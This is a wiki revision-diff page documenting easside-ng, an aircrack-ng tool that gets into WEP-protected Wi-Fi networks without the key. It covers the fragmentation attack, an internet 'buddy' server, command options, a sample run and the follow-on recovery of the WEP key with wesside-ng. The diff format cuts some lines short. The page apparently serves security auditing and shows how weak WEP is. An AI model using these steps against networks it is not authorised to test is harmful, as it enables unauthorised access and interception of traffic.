easside-ng
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
easside-ng [2009/09/05 23:27] – wiki-files.aircrack-ng.org become download.aircrack-ng.org/wiki-files mister_x | easside-ng [2013/03/19 18:21] (current) – Added link to the new page created of Besside-ng jano | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Easside-ng ====== | ====== Easside-ng ====== | ||
- | |||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | |||
- | This functionality will be available in a future release. It is NOT available currently. | ||
- | |||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | |||
===== Description ===== | ===== Description ===== | ||
Line 18: | Line 7: | ||
There are two primary papers "The Fragmentation Attack in Practice" | There are two primary papers "The Fragmentation Attack in Practice" | ||
- | In order to access the wireless network without knowing the WEP key is done by having | + | In order to access the wireless network without knowing the WEP key, we have the AP itself decrypt the packets. |
* The target access point must be able to communicate with the Internet. | * The target access point must be able to communicate with the Internet. | ||
Line 39: | Line 28: | ||
- Once a network is found, it tries to authenticate. | - Once a network is found, it tries to authenticate. | ||
- Once the program has successfully authenticated then it associates with the AP. | - Once the program has successfully authenticated then it associates with the AP. | ||
- | - After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. | + | - After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. |
- It then decrypts the IP network by guessing the next four bytes of PRGA using multicast frames and the linear keystream expansion technique. | - It then decrypts the IP network by guessing the next four bytes of PRGA using multicast frames and the linear keystream expansion technique. | ||
- It creates a permanent TCP connection with the " | - It creates a permanent TCP connection with the " | ||
Line 84: | Line 73: | ||
* Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP based on the MAC address or broadcasts. | * Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP based on the MAC address or broadcasts. | ||
* For each packet it needs to process, the packet must first be decrypted. | * For each packet it needs to process, the packet must first be decrypted. | ||
- | * Easside-ng creates a new packets composed of two fragments. | + | * Easside-ng creates a new packets composed of two fragments. |
* The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. | * The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. | ||
* The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng. | * The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng. | ||
Line 105: | Line 94: | ||
So you may also be asking "What is the linear keystream expansion technique?" | So you may also be asking "What is the linear keystream expansion technique?" | ||
- | The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. | + | The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. |
The linear keystream expansion technique (Arbaugh inductive) is reverse | The linear keystream expansion technique (Arbaugh inductive) is reverse | ||
Line 143: | Line 132: | ||
* -h Displays the list of options. | * -h Displays the list of options. | ||
- | * -v MAC address of the Acess Point (Optional) | + | * -v MAC address of the Access |
* -m | * -m | ||
* -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus " | * -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus " | ||
Line 156: | Line 145: | ||
NOTE: There are no parameters for buddy-ng. | NOTE: There are no parameters for buddy-ng. | ||
- | + | When you run easside-ng, it creates a file automatically in the current directory: | |
- | + | ||
- | When you run easside-ng, it creates a file automatically in the current directory | + | |
* prga.log - Contains the PRGA obtained through the fragmentation attack. | * prga.log - Contains the PRGA obtained through the fragmentation attack. | ||
Line 198: | Line 185: | ||
Where: | Where: | ||
- | * -f ath0 This is the wireless | + | * -f ath0 |
- | * -v 00: | + | * -v 00: |
- | * -c 9 This is the channel | + | * -c 9 |
- | * -s 10.116.23.144 | + | * -s 10.116.23.144 |
The system responds: | The system responds: | ||
Line 245: | Line 232: | ||
| | ||
- | Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/ | + | Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/ |
Line 261: | Line 248: | ||
First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple! | First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple! | ||
- | Playfully, this is known as "besside-ng". | + | Playfully, this is known as [[besside-ng|Besside-ng]]. |
==== Demonstrating Insecurity! ==== | ==== Demonstrating Insecurity! ==== | ||
Line 289: | Line 276: | ||
* It is running on Internet with a routeable IP address | * It is running on Internet with a routeable IP address | ||
- | * It is accessable | + | * It is accessible |
* Inbound and outbound UDP and TCP port 6969 is permitted. | * Inbound and outbound UDP and TCP port 6969 is permitted. | ||
easside-ng.1252186067.txt.gz · Last modified: 2009/09/05 23:27 by mister_x